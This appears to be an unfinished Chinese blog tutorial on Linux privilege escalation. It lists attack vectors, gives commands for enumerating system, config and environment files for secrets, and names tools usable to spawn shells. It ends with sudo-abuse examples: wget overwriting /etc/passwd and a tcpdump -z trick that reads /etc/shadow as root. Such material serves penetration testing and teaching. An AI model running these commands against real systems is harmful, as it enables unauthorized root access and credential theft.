大多数操作系统设计可为多个用户提供同时服务。提权中的“权”指的是允许用户执行的操作。普通特权一般指的是查看或编辑系统文件。特权升级意味着用户获得他们无权获得的特权。这些特权可用于删除文件,查看死人信息或悄咪咪安装一些程序(比如说木马),通常当系统存在允许绕过安全性的漏洞时就会发生提权。通常利用操作系统或软件中的BUG来获得提权。从而使骇客执行未经授权的操作,如插入永久后门,读写敏感信息。完成重启关机等操作!
提权一般分为:水平和垂直。
水平提权:从一个用户转移到另一个用户。[如su root]
垂直提权:一般将特权从普通用户升级为超级管理员
行动方向
内核漏洞
以ROOT身份运行的程序
已安装的软件
弱密码/重用密码/纯文本密码
内部服务
Suid配置错误
滥用Sudo权力
由root调用的可写脚本
路径配置错误
Cronjobs
卸载的文件系统
信息收集是关键!
1、收集信息。2、整理信息(分析收集到的信息和整合信息)3、搜索漏洞。4、修改代码(修改漏洞利用程序,使其适合当前环境)5、尝试攻击提权
————————我在军训 慢慢更新————————
查看发行类型,什么版本?
Cat /etc/issue
Cat /etc/*-release
Cat /etc/lsb-release #debian based
Cat /etc/redhat-release #Redhat based
查看内核版本,几位的系统?
Cat /proc/version
Uname -a uname -mrs
Rpm -q kernel
Dmesg | grep linux
Ls /boot | grep vmlinuz-
收集环境变量中的信息(可能存在的密码、API秘钥)
Cat /etc/profile
Cat /etc/bashrc
Cat ~/.bash_profile
Cat ~/.bashrc
Cat ~/.bash_logout
Env set
查看打印机
Lpsatat -a
查看正在运行的进程,哪个服务具有特权?
Ps aux
Ps -ef top
Cat /etc/services
root正在运行的服务?
Ps aux | grep root ps -ef | grep root
安装了什么程序?
Ls -alh /usr/bin
Ls -alh /sbin/
Dpkg -l
Rpm -qa
Ls -alh /var/cache/apt/archives0
Ls -alh /var/cache/yum
查看各项配置
Cat /etc/syslog.conf
Cat /etc/chttp.conf
Cat /etc/lighttpd.conf
Cat /etc/cups/cupsd.conf
Cat /etc/apache2/apache2.conf
Cat /etc/my.conf
Cat /etc/httpd/conf/httpd.conf
Cat /opt/lampp/etc/httpd.conf
查看计划任务
Crontab -l
是否有纯文本用户名密码?
有哪些NIC?是否连接到其他网络?
/sbin/ifconfig -a
Cat /etc/network/interface
Cat /etc/sysconfig/network
检查网络配置?DHCP服务器?DNS服务器?GATEWAY?
Cat /etc/resolv.conf
Cat /etc/sysconfig/network
Cat /etc/networks
Iptables -L
检查natstat
Netstat -anlp
Netstat -ano
缓存了什么?
Arp -e
Route
/sbin/route -nee
可用于产生SHELL的工具:
- Nmap
- Vim
- Less
- More
- Nano
- Cp
- Mv
- Find
什么是SUDO?
sudo是linux系统管理命令,是允许系统管理员让普通用户执行一些或全部root命令的一个工具,如halt,reboot,su等,这样不仅可以节省管理时间,同样也提高安全性,sudo不是shell的代替品,是一个命令
查看允许的命令
sudo -l
举例实战
wget
wget http://localhost:8080/passwd -O /etc/passwd
tcpdump
echo $'id\ncat /etc/shadow' > /tmp/.test
chmod +x /tmp/.test
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.test -Z root
我爱华为
加油